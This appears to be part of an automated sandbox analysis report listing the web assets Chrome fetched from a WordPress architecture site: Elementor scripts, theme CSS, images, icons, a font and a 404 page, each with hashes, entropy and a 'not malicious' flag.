                                Preview:/*! elementor - v3.6.4 - 13-04-2022 */."use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[819],{9220:(e,t,n)=>{var i=n(7914);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var s=i(n(8135));class _default extends elementorModules.ViewModule{constructor(...e){super(...e),this.documents={},this.initDocumentClasses(),this.attachDocumentsClasses()}getDefaultSettings(){return{selectors:{document:".elementor"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$documents:jQuery(e.document)}}initDocumentClasses(){this.documentClasses={base:s.default},elementorFrontend.hooks.doAction("elementor/frontend/documents-manager/init-classes",this)}addDocumentClass(e,t){this.documentClasses[e]=t}attachDocumentsClasses(){this.elements.$documents.each(((e,t)=>this.attachDocumentClass(jQuery(t))))}attachDocumentClass(e){const t=e.data(),n=t.elementorId,i=t.elementorType,s=this.documentClasses[i]||this.documentClasses.base;this.documents[n]=ne
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (4921)
                                Category:downloaded
                                Size (bytes):4960
                                Entropy (8bit):5.3887813142062875
                                Encrypted:false
                                SSDEEP:
                                MD5:F5B621848B08D050C1356FD7EBF9F31D
                                SHA1:968F1D63584A816A784CF9D61E7D11E393D753DD
                                SHA-256:E8EC042D48DAA8FE4031D44C608ADD6E3E9EE43BB1B2843910FD0F15EBF36722
                                SHA-512:8DF023C75827A937525F542CAB29A7DE5E83F7D3AA25FCECAB7D3D60DF1D615B5E256652A178ABE419BA6E8DBA5B2A6C2AFA63DA3DA045809F7EF6C5DD5226EE
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.6.4
                                Preview:/*! elementor - v3.6.4 - 13-04-2022 */.(()=>{"use strict";var e,r,_,t,i,a={},n={};function __webpack_require__(e){var r=n[e];if(void 0!==r)return r.exports;var _=n[e]={exports:{}};return a[e](_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=a,e=[],__webpack_require__.O=(r,_,t,i)=>{if(!_){var a=1/0;for(u=0;u<e.length;u++){for(var[_,t,i]=e[u],n=!0,c=0;c<_.length;c++)(!1&i||a>=i)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[c])))?_.splice(c--,1):(n=!1,i<a&&(a=i));if(n){e.splice(u--,1);var o=t();void 0!==o&&(r=o)}}return r}i=i||0;for(var u=e.length;u>0&&e[u-1][2]>i;u--)e[u]=e[u-1];e[u]=[_,t,i]},_=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,__webpack_require__.t=function(e,t){if(1&t&&(e=this(e)),8&t)return e;if("object"==typeof e&&e){if(4&t&&e.__esModule)return e;if(16&t&&"function"==typeof e.then)return e}var i=Object.create(null);__webpack_require__.r(i);var a={};r=r||[null,_({}),_([]),_(_)];for(var n=2&t&&e;"object"==typeof
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65497)
                                Category:downloaded
                                Size (bytes):107922
                                Entropy (8bit):4.878974366671187
                                Encrypted:false
                                SSDEEP:
                                MD5:4B89FBD3BAE39927234DA70B11338FA4
                                SHA1:A1857F8D6D37A2D7B17B5FD00CFD113D606F6B8B
                                SHA-256:00862D09B808862DE1472D08D76240A9B347A8A313A6BD92CDC661F71689341E
                                SHA-512:F022CE4234BAFF2397D73E15FDE9011D6629685345F77B37A0A8534C279BF44C51EA2EC6910AF84C6D25B2D6E45CFDBBCBF658CA4F73E7D910C532162C695515
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=3.6.4
                                Preview:/*! elementor - v3.6.4 - 13-04-2022 */..dialog-widget-content{background-color:#fff;position:absolute;border-radius:3px;-webkit-box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);overflow:hidden}.dialog-message{font-size:12px;line-height:1.5;-webkit-box-sizing:border-box;box-sizing:border-box}.dialog-type-lightbox{position:fixed;height:100%;width:100%;bottom:0;left:0;background-color:rgba(0,0,0,.8);z-index:9999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.dialog-type-lightbox .dialog-widget-content{margin:auto;width:375px}.dialog-type-lightbox .dialog-header{font-size:15px;color:#495157;padding:30px 0 10px;font-weight:500}.dialog-type-lightbox .dialog-message{padding:0 30px 30px;min-height:50px}.dialog-type-lightbox:not(.elementor-popup-modal) .dialog-header,.dialog-type-lightbox:not(.elementor-popup-modal) .dialog-message{text-align:center}.dialog-type-lightbox .dialog-buttons-wrapper{border-top:1px solid #e6e
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 1536x860, components 3
                                Category:downloaded
                                Size (bytes):250362
                                Entropy (8bit):7.972260355889888
                                Encrypted:false
                                SSDEEP:
                                MD5:094F6F0FFF4F2912C17A57B2B8A9B96D
                                SHA1:9C5A727D6A04B257B09C52FD11C2E25345527855
                                SHA-256:9BF2A512C14DCE86409566B841923BCF651937416522F3ED7AA816C6B3EB2E59
                                SHA-512:D4EDF1975FD4FB29681B77042CB23A6F89DFBE4F944DF252FE013B68B7233AEEB25B11B76BC5D9BCA50E78A22FFD2304943A1B546010AD878978D788BCA9AA71
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2024/05/01-1536x860.jpeg
                                Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......\...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....jF..}I..i..4.!.4.....)....J....J...b.....QE.......@..%8.Lf...%;.M..i.....)(4..QE..QE...E.Qp.R.is@..(..&)M%.&))i).CM4.LS.#".S......Z1.\`...Q.ZJ..))i@...N....CI.Z(.1K.E8P.b...... "4...I.` .Si.....R..b.S.F(.....Hh.(.-.(...b....i...M..!..E11.%:...QHN)3M.Ri...%0.(....(...(...(....(...(...(...-.....b...f..%...4f..
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 1536x839, components 3
                                Category:downloaded
                                Size (bytes):174417
                                Entropy (8bit):7.973466928378224
                                Encrypted:false
                                SSDEEP:
                                MD5:B58FB8FABDB51EBEC74836FE7FD4EE2D
                                SHA1:F9CD999758DF92ADCD7E7701D7806291450EDC20
                                SHA-256:75B7311FC095C894DF14AB4D86DB080C68CA99B93387DD4F04FABFBD083033E9
                                SHA-512:788614C03E939F4450EF384A0E55803D71CBA02FF8BC4CB58F406B7F31216DE807D4E5E4DCADF6ADC4C5828397180B5D2870C5B1F0CF17BE48D9AE77E253DC0A
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2022/06/KLEMANN-SHOWROOM-New-Photo-1-1536x839.jpg
                                Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......G...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..n}<.c8..2B.0.nS^%.a..qX.4V..~9J...0.P.b.S.I..f(.?...C(....e%?.b..i)....0.S..b........)...%......R.P.Q.\Rb...b..b...LR.(.(...J)h.......E-.........Z(.))qE.%%-...PiqI..JJZJ.CE..P.IK.J.))i(..4Q@.IKI@.i.)...(.....E%...)(.h......(.....(...1E....(.-.&(......b.....R.P..LS.I..n(.?.........(.1J......T...'.S..`..O...$
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CC (Windows), datetime=2022:11:21 14:11:03], progressive, precision 8, 480x246, components 3
                                Category:downloaded
                                Size (bytes):30819
                                Entropy (8bit):7.5416797317114215
                                Encrypted:false
                                SSDEEP:
                                MD5:0A309080D77A1E5A6B98F49C84C7FD45
                                SHA1:660BDC37422A37E793597692602313F37EC5870D
                                SHA-256:01D80148873F7378A1331617B76475BB64BE062EFB3BFCD0662EAD576C147CE9
                                SHA-512:EF927A7521EAE2F2EEE04837A84AE911D72E71FD8917577346B903749C5C01C08F812C67B3274DA12FCD19BD8D6029C2CE09206AFAAEAC80F5C2BEB2B31A1150
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2022/05/focal-1-1.jpg
                                Preview:.....KExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CC (Windows).2022:11:21 14:11:03..................................................................................&.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................R...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$.IJI$.S_?(a`.....5O......f.?..q...b.....D.....]o_..........=.r_R....foP....K/.a.\...{..../.^.<g)."..>v..
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (9345), with no line terminators
                                Category:downloaded
                                Size (bytes):9345
                                Entropy (8bit):5.0914930833545595
                                Encrypted:false
                                SSDEEP:
                                MD5:17621602C3CE25F6674B5729988C7F03
                                SHA1:53057D17B3834801315CC08061C860AAFC6F66A5
                                SHA-256:38DA8268A1294999C3EE5F981F435DCD9E4B73633F1AFCE62142A4060C7AED0D
                                SHA-512:16D007ABC92277BD2E8ECA3287C92803478C160D7BD837DB97D214E9887069CFC3101962E39135D2CEE2440CE63549CDB895BDFFDD2EE2977D00DBD60EC45D31
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/inc/plugins/elementor/assets/js/elementor.min.js?ver=6.6.2
                                Preview:!function(n){"use strict";n(window).on("elementor/frontend/init",function(){o.init(),e.init(),f.init(),t.init(),i.init()});var o={init:function(){if(Boolean(elementorFrontend.isEditMode()))for(var e in qodefCore.shortcodes)for(var t in qodefCore.shortcodes[e])o.reInitShortcode(e,t)},reInitShortcode:function(t,o){elementorFrontend.hooks.addAction("frontend/element_ready/"+t+".default",function(e){void 0===qodefCore.shortcodes[t][o]?console.log(o):"function"==typeof qodefCore.shortcodes[t][o].initSlider&&e.find(".qodef-instagram-swiper-container").length?qodefCore.shortcodes[t][o].initSlider(e.find(".qodef-instagram-swiper-container"),!1):"function"==typeof qodefCore.shortcodes[t][o].initSlider&&e.find(".qodef-swiper-container").length?qodefCore.shortcodes[t][o].initSlider(e.find(".qodef-swiper-container")):"function"==typeof qodefCore.shortcodes[t][o].initPopup&&e.find(".qodef-magnific-popup").length?qodefCore.shortcodes[t][o].initPopup(e.find(".qodef-magnific-popup")):"function"==typeo
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (20580), with no line terminators
                                Category:downloaded
                                Size (bytes):20580
                                Entropy (8bit):4.762510749511692
                                Encrypted:false
                                SSDEEP:
                                MD5:2510055ABB7488276EC53CA91DC9F242
                                SHA1:D3AD73B626A29A71F1739447529A2F80E3A5A32B
                                SHA-256:8E6E908E3D1BC42A336736065E7275C697795F8FB744949935286455953708EF
                                SHA-512:F782040A86092DC376A9C2E8CD5AACCA4CEBD4DCA2E5F69710634EB2F1B00EDE0AB584EDBE24ED7A18DD3385996D1223C309EADFEBD5541616A1901C43344156
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/qi-addons-for-elementor/assets/css/helper-parts.min.css?ver=6.6.2
                                Preview:@keyframes qi-addons-for-elementor-fade-in{0%{opacity:0;visibility:hidden;z-index:102}100%{opacity:1;visibility:visible;z-index:102}}@keyframes qi-addons-for-elementor-fade-out{0%{opacity:1;visibility:visible;z-index:102}100%{opacity:0;visibility:hidden;z-index:0}}@keyframes qodef-animate-underline-from-left{0%{transform:scaleX(1);transform-origin:right}37%{transform:scaleX(0);transform-origin:right}38%{transform:scaleX(0);transform-origin:left}100%{transform:scaleX(1);transform-origin:left}}@keyframes qodef-animate-underline-from-right{0%{transform:scaleX(1);transform-origin:left}37%{transform:scaleX(0);transform-origin:left}38%{transform:scaleX(0);transform-origin:right}100%{transform:scaleX(1);transform-origin:right}}@keyframes qodef-animate-underline-multiline{0%{background-size:100% 87%;background-position-x:right}38%{background-size:0 87%;background-position-x:right}39%{background-size:0 87%;background-position-x:left}100%{background-size:100% 87%;background-position-x:left}}@key
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                Category:downloaded
                                Size (bytes):518
                                Entropy (8bit):7.4315413793883405
                                Encrypted:false
                                SSDEEP:
                                MD5:66A91BF8F2BF28E0E7FA9A0C031C8318
                                SHA1:90AB18D3C584C0CBF6C67767C045251D1CE6C86E
                                SHA-256:EAE39F9F25891C568229D10024362EC6F3DAD66960E1B26715F28F07A034B985
                                SHA-512:58A99D3E3A4FDD8C7F7D6B7374A196D7E14F178AEB74B74B816B402FF30EA834E7FE03C5D0A1163DFE424F40EEB672A9CBF85479D5EFF5145F34627E175DC36E
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2022/04/cropped-favicon-32x32.png
                                Preview:.PNG........IHDR... ... .....szz.....pHYs..........+......IDATX..?h.A...7...xp.......lll.....%.3....Z.t...:...Hj...,R.Jj...........8#F..K...W..3........@..#...Z......-"."#.'..{.re..g}|P.c...^U.._.f...o./..H....L..l..\s..@.@.\oP.....F.....-.=4...../..W..E...((..".JY....6yrs...>PH*G..NV...T.|......<P..y....U..lD./.>{W..0..+S..@L.+..7..{=_.=.d.>...Q.W....j2gO....c....{...*.G.:;>s.^j....W.."..R.7..n..-....i.mnwF.....G..#g.?,?\.U}!....,s.@U..==._.}.l6.~.....9]*.~.......z..@ .....J!...!.....IEND.B`.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):2731
                                Entropy (8bit):5.134326161792236
                                Encrypted:false
                                SSDEEP:
                                MD5:E6FAE855021A88A0067FCC58121C594F
                                SHA1:6299AC3987B5E81725781799DAD361D19AC3B99D
                                SHA-256:E50F9CCD2D6582A58BA1879FA578E60D25FEA4C5EEDC07DEAFD14482B2403181
                                SHA-512:B67D641AD4DD65063621F73420A52BFE914F25C58C42C08B0A558A429744154901E05E363A358B56F922C0059FBC3822DF063CAC76AB49E02F100666A46D3F36
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.6
                                Preview:.wpcf7 .screen-reader-response {..position: absolute;..overflow: hidden;..clip: rect(1px, 1px, 1px, 1px);..clip-path: inset(50%);..height: 1px;..width: 1px;..margin: -1px;..padding: 0;..border: 0;..word-wrap: normal !important;.}...wpcf7 form .wpcf7-response-output {..margin: 2em 0.5em 1em;..padding: 0.2em 1em;..border: 2px solid #00a0d2; /* Blue */.}...wpcf7 form.init .wpcf7-response-output,..wpcf7 form.resetting .wpcf7-response-output,..wpcf7 form.submitting .wpcf7-response-output {..display: none;.}...wpcf7 form.sent .wpcf7-response-output {..border-color: #46b450; /* Green */.}...wpcf7 form.failed .wpcf7-response-output,..wpcf7 form.aborted .wpcf7-response-output {..border-color: #dc3232; /* Red */.}...wpcf7 form.spam .wpcf7-response-output {..border-color: #f56e28; /* Orange */.}...wpcf7 form.invalid .wpcf7-response-output,..wpcf7 form.unaccepted .wpcf7-response-output,..wpcf7 form.payment-required .wpcf7-response-output {..border-color: #ffb900; /* Yellow */.}...wpcf7-form-contro
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (22267), with no line terminators
                                Category:downloaded
                                Size (bytes):22267
                                Entropy (8bit):5.199021446819075
                                Encrypted:false
                                SSDEEP:
                                MD5:9E46F4E09250D68B5960072DD167400F
                                SHA1:2F914E4D81379F99A89665AD3EC1B66B51FBE1FC
                                SHA-256:47515B5A4650D059E7F8007B32BC55501ECCA662ECEF9DB4131C93815017E43F
                                SHA-512:730CE5FA0E3E82879B75A4FE5A1D4D5AFEBA19D30A20F971F7AB460BA93EF24689A8E8B4E4788CEFE5329FA786B392F812C8AE3A372150DC691E51767E0A09F5
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/themes/brok/assets/js/main.min.js?ver=6.6.2
                                Preview:!function(a){"use strict";window.qodef={},qodef.body=a("body"),qodef.html=a("html"),qodef.window=a(window),qodef.windowWidth=a(window).width(),qodef.windowHeight=a(window).height(),qodef.scroll=0,a(document).ready(function(){qodef.scroll=a(window).scrollTop(),i.init(),_.init(),o.init(),r.init()}),a(window).resize(function(){qodef.windowWidth=a(window).width(),qodef.windowHeight=a(window).height()}),a(window).scroll(function(){qodef.scroll=a(window).scrollTop()}),a(document).on("brok_trigger_get_new_posts",function(){_.init(),o.init()});var i={init:function(){i.addBodyClassName()},isBrowser:function(e){var t=!1;switch(e){case"chrome":t=/Chrome/.test(navigator.userAgent)&&/Google Inc/.test(navigator.vendor);break;case"safari":t=/Safari/.test(navigator.userAgent)&&/Apple Computer/.test(navigator.vendor);break;case"firefox":t=-1<navigator.userAgent.toLowerCase().indexOf("firefox");break;case"ie":t=0<window.navigator.userAgent.indexOf("MSIE ")||!!navigator.userAgent.match(/Trident.*rv\:11\.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (12602)
                                Category:downloaded
                                Size (bytes):57751
                                Entropy (8bit):5.315018840150806
                                Encrypted:false
                                SSDEEP:
                                MD5:5DDC26CE92EC803097461A35C8AA32E6
                                SHA1:2F90CF3E0E8D5D41ED0C1573D434750E85B08078
                                SHA-256:C682502BDD9D75AB27160338A8ACDBC9D1FE1587AB08E5D8BC04D785C3E65745
                                SHA-512:18E0C053E22B40F0FA904689EA0D7A1089B8E67B50C9614D7F50BD7F9D50177EB98CE964DC313A4B06CB70097AA1852F0BE5B5414C48DA32EA167767A6E31A73
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.5.11
                                Preview:/* FIX FOR WORDPRESS's CRAZY <p> TAG ANOMALY */..rs-p-wp-fix { display: none !important; margin: 0 !important; height: 0px !important; }../* NEW Z-INDEX FIX*/..wp-block-themepunch-revslider { position: relative }../* FIX FOR QUICK LOADING OF SLIDER SCRIPTS AND WP-ROCKET READDING IMG TAG INTO DOM*/./*rs-sbg-px rs-sbg-wrap img { display:none !important}*/../* MODAL BASICS */.rs-modal { position: fixed !important; z-index: 9999999 !important; pointer-events: none !important;}.rs-modal.rs-modal-auto { top: auto;bottom: auto;left: auto; right:auto; }.rs-modal.rs-modal-fullwidth,.rs-modal.rs-modal-fullscreen { top: 0px; left: 0px; width: 100%; height: 100%; }.rs-modal rs-fullwidth-wrap { position: absolute; top: 0px; left: 0px; height: 100%;}.rs-module-wrap.rs-modal { display:none; max-height: 100% !important; overflow: auto !important; pointer-events: auto !important;}.rs-module-wrap.hideallscrollbars.rs-modal { overflow: hidden !important; max-width: 100% !important}.rs-modal-cover { widt
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (13554)
                                Category:dropped
                                Size (bytes):13624
                                Entropy (8bit):5.2038341151289
                                Encrypted:false
                                SSDEEP:
                                MD5:CB589AC63C361A879C1CDD919C9FC1EF
                                SHA1:9DFF3EB4231601F2989A663E54F2471A88363BEC
                                SHA-256:97D9E455254DBBB00399128296F30688302B4FCB32811D3635DE05359D6B1061
                                SHA-512:18D76862861F7B3A7508FAAB3C717BB88C9E32225FBC380B6313C34C347F22B030C9F3FC6E09861000720C3ABC6FD3086C4F913571CEADC37FF7D8139D846811
                                Malicious:false
                                Reputation:unknown
                                Preview:/*!. * Packery layout mode PACKAGED v2.0.1. * sub-classes Packery. */.!function(a,b){"function"==typeof define&&define.amd?define("packery/js/rect",b):"object"==typeof module&&module.exports?module.exports=b():(a.Packery=a.Packery||{},a.Packery.Rect=b())}(window,function(){function a(b){for(var c in a.defaults)this[c]=a.defaults[c];for(c in b)this[c]=b[c]}a.defaults={x:0,y:0,width:0,height:0};var b=a.prototype;return b.contains=function(a){var b=a.width||0,c=a.height||0;return this.x<=a.x&&this.y<=a.y&&this.x+this.width>=a.x+b&&this.y+this.height>=a.y+c},b.overlaps=function(a){var b=this.x+this.width,c=this.y+this.height,d=a.x+a.width,e=a.y+a.height;return this.x<d&&b>a.x&&this.y<e&&c>a.y},b.getMaximalFreeRects=function(b){if(!this.overlaps(b))return!1;var c,d=[],e=this.x+this.width,f=this.y+this.height,g=b.x+b.width,h=b.y+b.height;return this.y<b.y&&(c=new a({x:this.x,y:this.y,width:this.width,height:b.y-this.y}),d.push(c)),e>g&&(c=new a({x:g,y:this.y,width:e-g,height:this.height}),d.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 480 x 246, 8-bit/color RGBA, non-interlaced
                                Category:downloaded
                                Size (bytes):53886
                                Entropy (8bit):7.988894386484999
                                Encrypted:false
                                SSDEEP:
                                MD5:EF6EB588B8D15059591128D13C5CA5F2
                                SHA1:E4BF42C1A551F9EA6B59F86F465514AD93B38EDF
                                SHA-256:87CA9C4145C43829139979C5BDC628417ECB17FE02A6450C5D9DD69B5A0FBFDA
                                SHA-512:E4D1BFCDB345AD09C038BAF30A3D93E8BE4607C5E080A8F289549ACD3BD32829B86AAF0CCBF2E5B0EBFC4886AB2E6CEF5052AA9FC32C97735808B0D9C85E1D88
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2022/04/client-5.png
                                Preview:.PNG........IHDR..............,T.....sRGB.........pHYs..,K..,K..=......iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2022-04-15</Attrib:Created>. <Attrib:ExtId>33007634-1542-4858-a6d9-b38806492024</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>. <pdf:Author>The Creatives</pdf:Author>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:xmp='http://ns.adobe.com/xap/1.0/'>. <xmp:CreatorTool>Canva</xmp:CreatorTool>. </rdf:Description>.</rdf:RDF>.</x:xmpmeta>.<?xpacket end='r'?>
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (7068)
                                Category:downloaded
                                Size (bytes):7231
                                Entropy (8bit):4.6931898308590165
                                Encrypted:false
                                SSDEEP:
                                MD5:6E4B9E0C932233AA7FD645BB3555046B
                                SHA1:D308CB51B839DF527E3D85D47BCC1E1EC91C0A6A
                                SHA-256:994368A37E6B666D7B5A29C6B6A71B80B23705727593D1E717418401822C93E4
                                SHA-512:FED09328F60C4427A5B22AFE2311B4FCB9D54B514451E5E3AA99CE9C58888200EAFFB70787CD663CA638FA5AB95E9DD97D79E522A0DC0DF09E5A1D1E4D237D9F
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/inc/icons/linear-icons/assets/css/linear-icons.min.css?ver=6.6.2
                                Preview:/*.Linearicons Free v1.0.0 - https://linearicons.com/free.By Perxis - https://perxis.com.(c) 2014-2015 Perxis.com.License: https://linearicons.com/free/license.*/.@font-face {font-family: 'Linearicons-Free';src:url('../fonts/Linearicons-Free.eot?w118d');src:url('../fonts/Linearicons-Free.eot?#iefixw118d') format('embedded-opentype'),url('../fonts/Linearicons-Free.woff2?w118d') format('woff2'),url('../fonts/Linearicons-Free.woff?w118d') format('woff'),url('../fonts/Linearicons-Free.ttf?w118d') format('truetype'),url('../fonts/Linearicons-Free.svg?w118d#Linearicons-Free') format('svg');font-weight: normal;font-style: normal;}.lnr{font-family:Linearicons-Free;speak:none;font-style:normal;font-weight:400;font-variant:normal;text-transform:none;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.lnr-home:before{content:"\e800"}.lnr-apartment:before{content:"\e801"}.lnr-pencil:before{content:"\e802"}.lnr-magic-wand:before{content:"\e803"}.lnr-drop:before{conte
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):18
                                Entropy (8bit):3.5724312513221195
                                Encrypted:false
                                SSDEEP:
                                MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                Malicious:false
                                Reputation:unknown
                                Preview:404 page not found
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65266)
                                Category:downloaded
                                Size (bytes):158005
                                Entropy (8bit):5.284310833637965
                                Encrypted:false
                                SSDEEP:
                                MD5:E53EC3D6E21BE78115810135F5E956FE
                                SHA1:523892839B88351523E0498BA881C4431197B54E
                                SHA-256:B15C3EA03D50C2430490E7416733A254FEEA4237BB60B54181BD3473EBE4149F
                                SHA-512:84B080EAAA043928F038421CEB18BBA7483AFEE5B6480A92EE01992317CDE2361A6DD255B16EC036E51E8A1FEF46B5379C6A5FF5C9EC69D682F96DEAA03A8842
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.17
                                Preview:/*!. * MediaElement.js. * http://www.mediaelementjs.com/. *. * Wrapper that mimics native HTML5 MediaElement (audio and video). * using a variety of technologies (pure JavaScript, Flash, iframe). *. * Copyright 2010-2017, John Dyer (http://j.hn/). * License: MIT. *. */.!function r(a,s,l){function d(n,e){if(!s[n]){if(!a[n]){var t="function"==typeof require&&require;if(!e&&t)return t(n,!0);if(u)return u(n,!0);var o=new Error("Cannot find module '"+n+"'");throw o.code="MODULE_NOT_FOUND",o}var i=s[n]={exports:{}};a[n][0].call(i.exports,function(e){var t=a[n][1][e];return d(t||e)},i,i.exports,r,a,s,l)}return s[n].exports}for(var u="function"==typeof require&&require,e=0;e<l.length;e++)d(l[e]);return d}({1:[function(e,t,n){},{}],2:[function(i,r,e){(function(e){var t,n=void 0!==e?e:"undefined"!=typeof window?window:{},o=i(1);"undefined"!=typeof document?t=document:(t=n["__GLOBAL_DOCUMENT_CACHE@4"])||(t=n["__GLOBAL_DOCUMENT_CACHE@4"]=o),r.exports=t}).call(this,"undefined"!=typeof global?global
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Web Open Font Format (Version 2), TrueType, length 36380, version 1.0
                                Category:downloaded
                                Size (bytes):36380
                                Entropy (8bit):7.993362390677641
                                Encrypted:true
                                SSDEEP:
                                MD5:9B970339A0470C73EB1FFFE154649A15
                                SHA1:D23076ADAC448F7EC461D929F9E69D7D1D1D1523
                                SHA-256:9339A32F4F7EE6222364DBA62D3C587179015D77C042751DEBEF03BA33EEF8C7
                                SHA-512:80E95DA8D4570FE73E1C4DB44FA69EDF57FAECA410473F3A9B96BE3AA64E97B38000DEF148841F3EF3583F7C5BCDBD99482D80EB715CD56C5D7CA8397F15314D
                                Malicious:false
                                Reputation:unknown
                                URL:https://fonts.gstatic.com/s/golostext/v4/q5uCsoe9Lv5t7Meb31EcExN8hA.woff2
